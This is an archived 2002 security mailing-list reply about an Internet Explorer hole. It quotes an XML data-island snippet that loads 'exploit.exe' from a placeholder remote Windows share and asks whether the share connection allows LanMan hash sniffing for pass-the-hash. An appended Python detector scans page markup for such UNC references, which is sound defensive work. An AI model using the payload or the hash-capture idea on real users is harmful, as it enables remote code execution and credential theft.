Vulnerability Development mailing list archives

Re: Rather large MSIE-hole


From: NoCoNFLiC <nocon () castleblack darkflame net>
Date: Fri, 15 Mar 2002 09:52:40 -0600

[jswensson () integres com] Thu, Mar 14, 2002 at 04:23:55PM -0800 wrote:
Well, if ActiveX is enabled,

doing this with an available, readable-by-everyone Windows share works

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
    <security>
        <exploit>
            <![CDATA[
            <object id="oFile"
classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="\\xxx.xxx.xxx.xxx\share\exploit.exe"></object>
            ]]>
        </exploit>
    </security>
</xml>



    I could be wrong, but could this also open the possibility of a
"pass the hash" type of attack by sniffing the LanMan hash
when the client connects to \\xxx.xxx.xxx.xxx\share\ ?

http://online.securityfocus.com/bid/233

-- 

- nocon

======================================

nocon () darkflame net
http://nocon.darkflame.net

======================================
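
Both the code load in the quoted snippet and the share connection the reply asks about start from a UNC path in page markup, so a proxy or mail filter can look for exactly that. The following is an added example, not part of the original post: the function names, the attribute set and the sample host `fileserver.example.test` are assumptions, and it generalizes from `codebase` to other URL-bearing attributes and to entity-escaped markup.

```python
import html
import re
from html.parser import HTMLParser

# \\host\share\... or file://host/...; file:///C:/... (no host) does not match.
UNC_RE = re.compile(r"^\s*(?:\\\\|file://)(?P<host>[^\\/\s]+)[\\/]", re.I)
CDATA_RE = re.compile(r"<!\[CDATA\[|\]\]>")
URL_ATTRS = {"codebase", "data", "src", "href"}  # assumed set of attributes to check

# Constructed sample modeled on the quoted snippet; the host is a placeholder.
SAMPLE_PAGE = r"""
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec"><security><exploit><![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"
 codebase="\\fileserver.example.test\share\control.exe"></object>
]]></exploit></security></xml>
"""


class _UncFinder(HTMLParser):
    """Collects tags whose URL-bearing attributes point at a remote share."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            m = UNC_RE.match(value or "") if name in URL_ATTRS else None
            if m:
                self.findings.append({"tag": tag, "attr": name,
                                      "host": m.group("host"),
                                      "value": value.strip()})


def find_unc_references(markup):
    # Content bound with dataformatas="html" is rendered as HTML, so unwrap
    # CDATA sections and entity-escaped markup before parsing.
    unwrapped = html.unescape(CDATA_RE.sub("", markup))
    finder = _UncFinder()
    finder.feed(unwrapped)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for finding in find_unc_references(SAMPLE_PAGE):
        print(finding)
```

Each finding carries the remote host name, which can be compared against an allowlist of internal file servers before alerting.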